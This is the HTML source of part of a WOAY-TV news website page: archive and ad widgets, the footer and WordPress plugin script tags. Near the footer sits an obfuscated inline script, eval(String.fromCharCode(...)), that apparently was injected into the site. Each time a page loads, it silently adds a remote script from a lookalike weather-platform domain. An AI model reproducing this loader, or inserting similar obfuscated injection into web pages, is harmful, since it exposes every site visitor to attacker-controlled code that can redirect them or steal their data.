https://i0.wp.com/woay.com/wp-content/uploads/2021/02/ENTER-TO-WIN_AD-SIZE-1.jpg?w=1392&amp;ssl=1 1392w" data-lazy-sizes="(max-width: 300px) 100vw, 300px" data-lazy-src="https://i0.wp.com/woay.com/wp-content/uploads/2021/02/ENTER-TO-WIN_AD-SIZE-1.jpg?fit=300%2C168&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a></aside><aside id="archives-6" class="td_block_template_1 widget archives-6 widget_archive"><h4 class="block-title"><span>News Archives</span></h4>		<label class="screen-reader-text" for="archives-dropdown-6">News Archives</label>
		<select id="archives-dropdown-6" name="archive-dropdown">
			
			<option value="">Select Month</option>
				<option value='https://woay.com/2022/12/'> December 2022 </option>
	<option value='https://woay.com/2022/11/'> November 2022 </option>
	<option value='https://woay.com/2022/10/'> October 2022 </option>
	<option value='https://woay.com/2022/09/'> September 2022 </option>
	<option value='https://woay.com/2022/08/'> August 2022 </option>
	<option value='https://woay.com/2022/07/'> July 2022 </option>
	<option value='https://woay.com/2022/06/'> June 2022 </option>
	<option value='https://woay.com/2022/05/'> May 2022 </option>
	<option value='https://woay.com/2022/04/'> April 2022 </option>
	<option value='https://woay.com/2022/03/'> March 2022 </option>
	<option value='https://woay.com/2022/02/'> February 2022 </option>
	<option value='https://woay.com/2022/01/'> January 2022 </option>
	<option value='https://woay.com/2021/12/'> December 2021 </option>
	<option value='https://woay.com/2021/11/'> November 2021 </option>
	<option value='https://woay.com/2021/10/'> October 2021 </option>
	<option value='https://woay.com/2021/09/'> September 2021 </option>
	<option value='https://woay.com/2021/08/'> August 2021 </option>
	<option value='https://woay.com/2021/07/'> July 2021 </option>
	<option value='https://woay.com/2021/06/'> June 2021 </option>
	<option value='https://woay.com/2021/05/'> May 2021 </option>
	<option value='https://woay.com/2021/04/'> April 2021 </option>
	<option value='https://woay.com/2021/03/'> March 2021 </option>
	<option value='https://woay.com/2021/02/'> February 2021 </option>
	<option value='https://woay.com/2021/01/'> January 2021 </option>
	<option value='https://woay.com/2020/12/'> December 2020 </option>
	<option value='https://woay.com/2020/11/'> November 2020 </option>
	<option value='https://woay.com/2020/10/'> October 2020 </option>
	<option value='https://woay.com/2020/09/'> September 2020 </option>
	<option value='https://woay.com/2020/08/'> August 2020 </option>
	<option value='https://woay.com/2020/07/'> July 2020 </option>
	<option value='https://woay.com/2020/06/'> June 2020 </option>
	<option value='https://woay.com/2020/05/'> May 2020 </option>
	<option value='https://woay.com/2020/04/'> April 2020 </option>
	<option value='https://woay.com/2020/03/'> March 2020 </option>
	<option value='https://woay.com/2020/02/'> February 2020 </option>
	<option value='https://woay.com/2020/01/'> January 2020 </option>
	<option value='https://woay.com/2019/10/'> October 2019 </option>
	<option value='https://woay.com/2019/09/'> September 2019 </option>
	<option value='https://woay.com/2019/08/'> August 2019 </option>
	<option value='https://woay.com/2019/07/'> July 2019 </option>
	<option value='https://woay.com/2019/06/'> June 2019 </option>
	<option value='https://woay.com/2019/05/'> May 2019 </option>
	<option value='https://woay.com/2019/04/'> April 2019 </option>
	<option value='https://woay.com/2019/03/'> March 2019 </option>
	<option value='https://woay.com/2019/02/'> February 2019 </option>
	<option value='https://woay.com/2019/01/'> January 2019 </option>
	<option value='https://woay.com/2018/12/'> December 2018 </option>
	<option value='https://woay.com/2018/11/'> November 2018 </option>
	<option value='https://woay.com/2018/10/'> October 2018 </option>
	<option value='https://woay.com/2018/09/'> September 2018 </option>
	<option value='https://woay.com/2018/08/'> August 2018 </option>
	<option value='https://woay.com/2018/07/'> July 2018 </option>
	<option value='https://woay.com/2018/06/'> June 2018 </option>
	<option value='https://woay.com/2018/05/'> May 2018 </option>
	<option value='https://woay.com/2018/04/'> April 2018 </option>
	<option value='https://woay.com/2018/03/'> March 2018 </option>
	<option value='https://woay.com/2018/02/'> February 2018 </option>
	<option value='https://woay.com/2018/01/'> January 2018 </option>
	<option value='https://woay.com/2017/12/'> December 2017 </option>
	<option value='https://woay.com/2017/11/'> November 2017 </option>
	<option value='https://woay.com/2017/10/'> October 2017 </option>
	<option value='https://woay.com/2017/09/'> September 2017 </option>
	<option value='https://woay.com/2017/08/'> August 2017 </option>
	<option value='https://woay.com/2017/07/'> July 2017 </option>
	<option value='https://woay.com/2017/06/'> June 2017 </option>
	<option value='https://woay.com/2017/05/'> May 2017 </option>
	<option value='https://woay.com/2017/04/'> April 2017 </option>
	<option value='https://woay.com/2017/03/'> March 2017 </option>
	<option value='https://woay.com/2017/02/'> February 2017 </option>
	<option value='https://woay.com/2017/01/'> January 2017 </option>
	<option value='https://woay.com/2016/12/'> December 2016 </option>
	<option value='https://woay.com/2016/11/'> November 2016 </option>
	<option value='https://woay.com/2016/09/'> September 2016 </option>

		</select>

<script type="text/javascript">
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "archives-dropdown-6" );
	function onSelectChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) {
			document.location.href = this.options[ this.selectedIndex ].value;
		}
	}
	dropdown.onchange = onSelectChange;
})();
/* ]]> */
</script>
			</aside><aside id="search-3" class="td_block_template_1 widget search-3 widget_search"><form method="get" class="td-search-form-widget" action="https://woay.com/">
    <div role="search">
        <input class="td-widget-search-input" type="text" value="" name="s" id="s" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="searchsubmit" value="Search" />
    </div>
</form></aside><aside id="adrotate_widgets-9" class="td_block_template_1 widget adrotate_widgets-9 adrotate_widgets"><h4 class="block-title"><span>register-for-new-river-ctc</span></h4><div class="g g-1"><div class="g-single a-37"><a class="gofollow" data-track="MzcsMSwxLDYw" href="https://www.newriver.edu/"><img src="https://i0.wp.com/woay.com/wp-content/uploads/2022/07/07-22-FL22-Digital-Ad_348x230.jpg?ssl=1" /></a></div></div></aside>
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-sidebar tdi_59 td_block_template_1 ">

<style>
/* custom css */
.tdi_59.td-a-rec{
					text-align: center;
				}.tdi_59 .td-element-style{
					z-index: -1;
				}.tdi_59.td-a-rec-img{
				    text-align: left;
				}.tdi_59.td-a-rec-img img{
                    margin: 0 auto 0 0;
                }@media (max-width: 767px) {
				    .tdi_59.td-a-rec-img {
				        text-align: center;
				    }
                }
</style><script type="text/javascript">
var td_screen_width = window.innerWidth;
window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width >= 1140 ) {
			        
			        /* large monitors */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:300px;height:600px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-7033249135551504");
		            adEl.setAttribute("data-ad-slot", "9878655915");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width >= 1019  && td_screen_width < 1140 ) {
			    
			        /* landscape tablets */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:300px;height:250px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-7033249135551504");
		            adEl.setAttribute("data-ad-slot", "9878655915");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width >= 768  && td_screen_width < 1019 ) {
			    
			        /* portrait tablets */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:300px;height:250px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-7033249135551504");
		            adEl.setAttribute("data-ad-slot", "9878655915");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width < 768 ) {
			    
			        /* Phones */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:300px;height:250px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-7033249135551504");
		            adEl.setAttribute("data-ad-slot", "9878655915");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});</script>
<div class="td-block-title-wrap"><h4 class="block-title td-block-title"><span class="td-pulldown-size">- Advertisement -</span></h4></div><noscript id="td-ad-placeholder"></noscript></div>

 <!-- end A --> 

                            </div>
                        </div>
                                    </div> <!-- /.td-pb-row -->
        </div> <!-- /.td-container -->
    </div> <!-- /.td-main-content-wrap -->

<!-- Instagram -->

	
	
            <div class="tdc-footer-wrap ">

                <!-- Footer -->
				<div class="td-footer-wrapper td-footer-container td-container-wrap td-footer-template-4 ">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
                		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span12">
                <div class="td-footer-info"><div class="footer-logo-wrap"><a href="https://woay.com/"><img class="td-retina-data" src="https://woay.com/wp-content/uploads/2020/03/WOAY-400-X-137.png" data-retina="https://woay.com/wp-content/uploads/2020/03/WOAY-400-X-137.png" alt="WOAY News" title="WOAY News"  width="400" height="137" /></a></div><div class="footer-text-wrap">WOAY-TV is a family-owned television station located in Oak Hill, WV.  WOAY covers nine counties in total: Fayette, Greenbrier, Raleigh, Summers, Monroe, Mercer, Wyoming, and McDowell Counties in West Virginia and Tazewell County, Virginia. <div class="footer-email-wrap">Contact us: <a href="mailto:news@woay.com">news@woay.com</a></div></div><div class="footer-social-wrap td-social-style-2">
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/woaynewswatch/" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.instagram.com/woaynewswatch/" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="mailto:news@woay.com" title="Mail">
                <i class="td-icon-font td-icon-mail-1"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/WOAYNewsWatch" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.youtube.com/channel/UCWxMcXSm9GIVIADBYoZ4dxQ" title="Youtube">
                <i class="td-icon-font td-icon-youtube"></i>
            </a>
        </span></div></div>            </div>
        </div>
    </div>
</div>
                <!-- Sub Footer -->
				    <div class="td-sub-footer-container td-container-wrap ">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span td-sub-footer-menu">
                    <div class="menu-td-demo-footer-menu-container"><ul id="menu-td-demo-footer-menu" class="td-subfooter-menu"><li id="menu-item-78807" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-78807"><a href="https://woay.com/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-77960" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-77960"><a href="https://woay.com/contact-us/">Contact Us</a></li>
<li id="menu-item-106321" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-106321"><a href="https://woay.com/wp-content/uploads/2022/07/EEO-Report-2021-2022.pdf">EEO</a></li>
<li id="menu-item-77959" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-77959"><a target="_blank" rel="noopener" href="https://publicfiles.fcc.gov/tv-profile/woay-tv">Public Profile</a></li>
</ul></div>                </div>

                <div class="td-pb-span td-sub-footer-copy">
                    Website by <a href="https://woay.com">WOAY-TV</a>                 </div>
            </div>
        </div>
    </div>
            </div><!--close td-footer-wrap-->
			
</div><!--close td-outer-wrap-->



		<script type="text/javascript">
			window.RS_MODULES = window.RS_MODULES || {};
			window.RS_MODULES.modules = window.RS_MODULES.modules || {};
			window.RS_MODULES.waiting = window.RS_MODULES.waiting || [];
			window.RS_MODULES.defered = true;
			window.RS_MODULES.moduleWaiting = window.RS_MODULES.moduleWaiting || {};
			window.RS_MODULES.type = 'compiled';
		</script>
				<script type="text/javascript" alt='evo_map_styles'>
		/*<![CDATA[*/
		var gmapstyles = 'default';
		/* ]]> */
		</script>		
		
<!-- GTM Container placement set to footer -->
<!-- Google Tag Manager (noscript) -->
				<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-K8BTK4Q" height="0" width="0" style="display:none;visibility:hidden" aria-hidden="true"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->

    <!--

        Theme: Newspaper by tagDiv.com 2022
        Version: 12.1 (rara)
        Deploy mode: deploy
        
        uid: 63a233e69b5d2
    -->

    
<!-- Custom css from theme panel -->
<style type="text/css" media="screen">
/* custom css theme panel */
li {list-style-type: none !important;}

</style>

<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,112,115,100,100,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,100,100,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,32,61,61,32,34,115,108,101,99,116,114,101,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,108,101,99,116,114,101,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,48,44,49,48,49,44,49,49,57,44,49,49,53,44,52,54,44,49,49,57,44,49,48,49,44,57,55,44,49,49,54,44,49,48,52,44,49,48,49,44,49,49,52,44,49,49,50,44,49,48,56,44,49,48,56,44,49,48,56,44,57,55,44,49,49,54,44,49,48,50,44,49,49,49,44,49,49,52,44,49,48,57,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,57,57,44,49,49,49,44,49,49,55,44,49,49,48,44,49,49,54,44,49,48,49,44,49,49,52,44,49,49,53,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,52,57,44,52,54,44,53,48,44,53,49,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125));</script><div class='evo_lightboxes' style='display:block'>					<div class='evo_lightbox eventcard eventon_events_list' id='' >
						<div class="evo_content_in">													
							<div class="evo_content_inin">
								<div class="evo_lightbox_content">
									<a class='evolbclose '>X</a>
									<div class='evo_lightbox_body eventon_list_event evo_pop_body evcal_eventcard'> </div>
								</div>
							</div>							
						</div>
					</div>
					</div><style id='wp-block-image-inline-css' type='text/css'>
.wp-block-image img{height:auto;max-width:100%;vertical-align:bottom}.wp-block-image.has-custom-border img,.wp-block-image img{box-sizing:border-box}.wp-block-image.aligncenter{text-align:center}.wp-block-image.alignfull img,.wp-block-image.alignwide img{height:auto;width:100%}.wp-block-image.aligncenter,.wp-block-image .aligncenter,.wp-block-image.alignleft,.wp-block-image .alignleft,.wp-block-image.alignright,.wp-block-image .alignright{display:table}.wp-block-image.aligncenter>figcaption,.wp-block-image .aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image.alignright>figcaption,.wp-block-image .alignright>figcaption{display:table-caption;caption-side:bottom}.wp-block-image .alignleft{float:left;margin:.5em 1em .5em 0}.wp-block-image .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-image .aligncenter{margin-left:auto;margin-right:auto}.wp-block-image figcaption{margin-top:.5em;margin-bottom:1em}.wp-block-image.is-style-circle-mask img,.wp-block-image.is-style-rounded img,.wp-block-image .is-style-rounded img{border-radius:9999px}@supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){.wp-block-image.is-style-circle-mask img{-webkit-mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="50"/></svg>');mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="50"/></svg>');mask-mode:alpha;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;-webkit-mask-position:center;mask-position:center;border-radius:0}}.wp-block-image :where(.has-border-color){border-style:solid}.wp-block-image :where([style*=border-top-color]){border-top-style:solid}.wp-block-image :where([style*=border-right-color]){border-right-style:solid}.wp-block-image :where([style*=border-bottom-color]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-color]){border-left-style:solid}.wp-block-image :where([style*=border-width]){border-style:solid}.wp-block-image :where([style*=border-top-width]){border-top-style:solid}.wp-block-image :where([style*=border-right-width]){border-right-style:solid}.wp-block-image :where([style*=border-bottom-width]){border-bottom-style:solid}.wp-block-image :where([style*=border-left-width]){border-left-style:solid}.wp-block-image figure{margin:0}
</style>
<style id='global-styles-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='rs-plugin-settings-css' href='https://woay.com/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.5.8' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
#rs-demo-id {}
</style>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/11.5.1/_inc/build/photon/photon.min.js' id='jetpack-photon-js'></script>
<script type='text/javascript' id='clicktrack-adrotate-js-extra'>
/* <![CDATA[ */
var click_object = {"ajax_url":"https:\/\/woay.com\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/adrotate/library/jquery.adrotate.clicktracker.js' id='clicktrack-adrotate-js'></script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.6.4' id='swv-js'></script>
<script type='text/javascript' id='contact-form-7-js-extra'>
/* <![CDATA[ */
var wpcf7 = {"api":{"root":"https:\/\/woay.com\/wp-json\/","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.6.4' id='contact-form-7-js'></script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.5.8' defer async id='tp-tools-js'></script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.5.8' defer async id='revmin-js'></script>
<script type='text/javascript' id='ppress-frontend-script-js-extra'>
/* <![CDATA[ */
var pp_ajax_form = {"ajaxurl":"https:\/\/woay.com\/wp-admin\/admin-ajax.php","confirm_delete":"Are you sure?","deleting_text":"Deleting...","deleting_error":"An error occurred. Please try again.","nonce":"b75d674948","disable_ajax_form":"false","is_checkout":"0","is_checkout_tax_enabled":"0"};
/* ]]> */
</script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/wp-user-avatar/assets/js/frontend.min.js?ver=4.3.2' id='ppress-frontend-script-js'></script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.16.2' id='gtm4wp-form-move-tracker-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/6.1.1/wp-includes/js/underscore.min.js' id='underscore-js'></script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/td-cloud-library/assets/js/js_posts_autoload.min.js?ver=87b3292f51aec51c00e6ce7db9b73ed1' id='tdb_js_posts_autoload-js'></script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/td-composer/legacy/Newspaper/js/tagdiv_theme.min.js?ver=12.1' id='td-site-min-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/6.1.1/wp-includes/js/comment-reply.min.js' id='comment-reply-js'></script>
<script type='text/javascript' src='//woay.com/wp-content/plugins/eventON/assets/js/eventon_functions.js?ver=2.6.12' id='evcal_functions-js'></script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/eventON/assets/js/handlebars.js?ver=2.6.12' id='evo_handlebars-js'></script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/eventON/assets/js/jquery.mobile.min.js?ver=2.6.12' id='evo_mobile-js'></script>
<script type='text/javascript' src='//woay.com/wp-content/plugins/eventON/assets/js/jquery.mousewheel.min.js?ver=2.6.12' id='evo_mouse-js'></script>
<script type='text/javascript' id='evcal_ajax_handle-js-extra'>
/* <![CDATA[ */
var the_ajax_script = {"ajaxurl":"https:\/\/woay.com\/wp-admin\/admin-ajax.php","postnonce":"cb6aaa11f4"};
/* ]]> */
</script>
<script type='text/javascript' src='//woay.com/wp-content/plugins/eventON/assets/js/eventon_script.js?ver=2.6.12' id='evcal_ajax_handle-js'></script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-lazy-images/dist/intersection-observer.js?minify=false&#038;ver=83ec8aa758f883d6da14' id='jetpack-lazy-images-polyfill-intersectionobserver-js'></script>
<script type='text/javascript' id='jetpack-lazy-images-js-extra'>
/* <![CDATA[ */
var jetpackLazyImagesL10n = {"loading_warning":"Images are still loading. Please cancel your print and try again."};
/* ]]> */
</script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-lazy-images/dist/lazy-images.js?minify=false&#038;ver=8767d0da914b289bd862' id='jetpack-lazy-images-js'></script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/td-cloud-library/assets/js/js_files_for_front.min.js?ver=87b3292f51aec51c00e6ce7db9b73ed1' id='tdb_js_files_for_front-js'></script>

<!-- JS generated by theme -->

<script>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</script>

	<script src='https://stats.wp.com/e-202251.js' defer></script>
	<script>
		_stq = window._stq || [];
		_stq.push([ 'view', {v:'ext',blog:'173639802',post:'108441',tz:'-5',srv:'woay.com',j:'1:11.5.1'} ]);
		_stq.push([ 'clickTrackerInit', '173639802', '108441' ]);
	</script>
</body>
</html>